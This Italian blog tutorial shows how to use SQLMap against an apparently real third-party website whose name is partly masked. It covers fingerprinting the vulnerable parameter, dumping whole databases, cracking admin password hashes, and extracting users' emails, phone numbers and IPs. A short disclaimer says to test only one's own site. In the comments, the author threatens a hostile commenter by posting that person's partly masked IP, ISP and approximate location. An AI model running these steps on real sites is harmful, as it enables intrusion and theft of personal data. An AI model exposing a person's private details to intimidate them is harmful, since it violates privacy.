[Pentesting]SQLMap: Hackerare un sito con SQLmap

Vedi anche: 7 tools per pentesting su Ubuntu, come installarli

La SQL Injection è una pratica molto diffusa tra gli hackers, quasi tutti i siti che vengono gestiti da database SQL sono vulnerabili alla SQL Injection (o Query Injection), viene riconosciuta dai link che terminano con *.php?id=1(l’1 può cambiare) dove “id” è la variabile vulnerabile, ma attenzione, non tutte sono vulnerabili. Per spiegare meglio cos’è l’SQL injection dovremmo stare qui a parlare per un pochino, quindi sorvoliamo e passiamo a SQLMap

Avviamo un terminale in modalità root attraverso il comando

sudo -s

poi navighiamo nella cartella dove è situato SQLMap attraverso la funzione

cd

e digitiamo

./sqlmap.py

per aprire SQLMap

Questa è la struttura (Sintassi) di SQLMap:

./sqlmap.py  (-u sta per URL) <<www.sito.it/*.php?id=*>>   (per mostrare a schermo)

prenderò come sito target un sito un po’ datato (che offuschiamo per ovvi motivi):  http://www.p*****b.com/s*********e.php?id=1
(dovrebbe essere vulnerabile)

quindi come prima fase eseguiamo il fingerprint del sito attraverso la funzione -u

quindi eseguiamo questo comando:

./sqlmap.py -u http://www.p*****b.com/s*********e.php?id=1

Fingerprinting in corso… “Il parametro “id=1″ dovrebbe essere vulnerabile”

Esito positivo: parametro id=1 vulnerabile, database utilizzato: MySQL Payload = id=1

Adesso che sappiamo (quasi) tutto su questo sito, dobbiamo sapere i nomi dei database, quindi utilizzeremo questo comando:

./sqlmap.py -u http://www.p*****b.com/s*********e.php?id=1 --dbs

(–dbs sta per databases)

una volta ottenuti i nomi dei database, ne selezioneremo uno attraverso l’opzione -D quindi eseguiremo in ordine questi 2 comandi:

./sqlmap.py -u http://www.p*****b.com/s********e.php?id=1 -D p*****b
./sqlmap.py -u http://www.p*****b.com/s*********e.php?id=1 -D p*****b --tables --columns --threads 10 --dump

Spieghiamo cosa facciamo con i due comandi:
-Con il primo chiediamo a SQLMap di analizzare il database
-Con il secondo chiediamo a SQLMap di stamparci a schermo tutto il contenuto del database (tabelle, colonne), di impostare 10 threads per una ricerca più rapida.
(Guarda foto)

Una volta terminata la scansione, trovate le password ci chiederà di craccare proprio quest’ultime, perchè purtroppo le password sono criptate attraverso MD5, quindi premiamo “y” per confermare l’operazione e definiamo il dizionario che vogliamo usare, io ho usato quello classico di SQLMap, premendo “1”, poi ci chiedera se vogliamo usare dei suffissi, ora non ci soffermiamo sui suffissi, noi premiamo “N” ed ecco che la procedura di cracking inizierà. Se non riesce a craccare le password ce le scrive in una tabella(le password sono criptate)  con i nomi degli ADMIN del sito, che dovremo decriptare da soli con programmi come hashcat

sql5

Ecco la procedura di cracking:

sql6

Altre password trovate, come vedete sono scritte in formato MD5, cioè criptate e ci chiede ancora una volta di decriptarle.

Questi sono dei dati che ha estrapolato ma non sò di preciso cosa sono…

Una volta ottenute le password decriptate dobbiamo solo cercare il pannello di controllo ADMIN del sito

Con SQLMap non possiamo solamente trovare le password, possiamo anche estrapolare dati sensibili come EMails, o addirittura numeri di telefono, indirizzi IP e altro (come possiamo vedere in foto)

possiamo estrapolare dati di questo tipo, chiedendo a SQLMap di mostrarci solamente le tabelle che a loro volta contengono le colonne contenenti i dati, quindi gli dobbiamo dare il seguente comando per vedere tutte le tabelle disponibili

./sqlmap.py -u http://www.p*****b.com/s*********e.php?id=1 -D p*****b --tables --dump

Questo comando invece serve a selezionare una determinata tabella e la colonna (il contenuto della colonna sinistra per intenderci), dobbiamo individuare tabelle come “wp_users” o “user_data” o altro, e colonne come “emails” “phone_number” “ip” “last_ip” ecc…
Tutto questo si svolge con il comando:

./sqlmap.py -u http://www.p*****b.com/s*********e.php?id=1 -D p*****b -T (nome della tabella scelta) -C (nome della colonna scelta all'interno della tabella (la colonna sinistra)) --threads 10 --dump

Spero che questa guida vi sia piaciuta!

Attenzione, le informazioni presenti in questa guida potrebbero essere usate per scopi illegali, la redazione di InTheBit non si assume alcuna responsabilità. Testate il tutto su di un sito di vostra proprietà per valutarne la sicurezza, in caso contrario potreste incorrere in problematiche legali anche gravi.


Non perdiamoci di vista!

Segui la pagina Facebook e il canale Telegram per non perdere le ultime novità.
Se vuoi risparmiare con i tuoi acquisti online, iscriviti ai nostri canali: Offerte Tech, Xiaomi Coupon, Coupon e Offerte Amazon e Offerte Droni. Per info e consigli, chiedi nel nostro Gruppo.


Vivo a Roma, sono appassionato da sempre di tecnologia, tutto ciò che riguarda l'open source, Linux, Android. Spero i miei articoli saranno di vostro gradimento!

17 Comments
  1. e tutto una grossa cazzata quello che hai elencato

  2. stefano belli caro mio non saresti in grado manco di trovare il tuo pisello mentre pisci ricordati grosso imbecille gli hacker non fanno mai nulla di simile tanto meno publicano le loro cose elimina subito questa guida o mi arrabbio./.; sai cosa ti faccio dopo? lascioa te una risposta

    • activista: parli come un bimbo scrotominkia di 2 anni

    • Reply
      Stefano Belli(InTheBit) 18 Marzo 2015 at 17:16

      Ah, activista, ti rispondo ancora

      visto che tu parli di essere un hacker, e che la mia guida è scritta male…
      perchè il tuo indirizzo email ha come dominio .com.uk e non .co.uk? Uno come te dovrebbe sapere che il dominio della gran bretagna è .co.uk (se non parli inglese(ma dubito, dici di essere un hacker, no?) ecco la sua pronuncia ==> dat co dat iuchei ).

      Comunque ecco l’indirizzo che hai riportato: “[email protected]” (WTF?) (.co.uk <= è corretto, amico mio)

      Questo è il tuo Indirizzo IP: 151.16.***.** ?
      Continuo? Conosco anche il tuo Internet Service Provider (sei un hacker, ma dubito, comunque Internet Service Provider è il tuo operatore telefonico), conosco la tua posizione approssimativa ma non approfondisco (Non è attendibile tuttavia).
      Per sicurezza ho anche effettuato un traceroute sul tuo indirizzo IP e guardacaso… c'è un server che si chiama wind.mix-it.net [MIX: Milan Internet eXchange]

      ======/////////////////===========
      ISP: Infostrada
      Compagnia: WIND Telecomunicazioni
      Europa, Italia
      Città : ********
      CAP: 1… (Non attendibile)
      =======================

      Per quanto sei hacker (O come dice Lyon [un youtuber] sei un "acer" ). Non ti sei nemmeno protetto da una VPN/Tunnel.
      Tutti questi dati come li ho ottenuti? Dashboard di WordPress.
      Attenti quando commentate! E soprattutto attento tu "activista"

      Cosa intendo fare con questo IP? Niente. Ovviamente ne tengo conto.

    • Reply
      Stefano Belli (InTheBit) 12 Marzo 2015 at 20:10

      Ciao, “activista” (si scrive con h)
      Se saresti ben informato, dovresti sapere che queste tecniche non vengono usate solo ed esclusivamente dagli hackers (crackers), ma anche da veri e propri penetration testers, per testare ad esempio, la sicurezza di un database SQL , perciò già hai torto.
      Dimmi cos’è che ho sbagliato così imparo meglio.
      Dimmi, poi che faresti se ti arrabbi?
      Tenteresti un bruteforce con hydra sulla mia email? O cos’altro?
      Attendo una tua risposta.
      Sii più educato 🙂

    • Innanzitutto usa l’educazione.
      Poi cosa faresti?

  3. Il sito in questione è per caso porta? 🙂 Ad ogni modo hai trovato un nuovo iscritto trovo i tuoi articoli molto belli.

  4. *pornhub?

  5. Salve.
    Articolo interessante.
    Su una SQL injection mi esce:
    (Critical)heuristic detected that the target is protected by some kind of WAFIDSIPF
    Poi mi compare la dicitura:
    WARNING: no WAF/IDS/IPS production has been identified.
    Cosa significa?
    Grazie

    • Reply
      StefanoBelli (ITB) 16 Agosto 2015 at 21:57

      Ti avverte che il tuo bersaglio potrebbe essere protetto da un tool per proteggere i DB SQL
      Poi ti dice che non lo ha rilevato.

Leave a reply

InTheBit.it
Dispositivi aggiunti
  • Confronta Smartphone (0)
  • Confronta Notebook (0)
Compara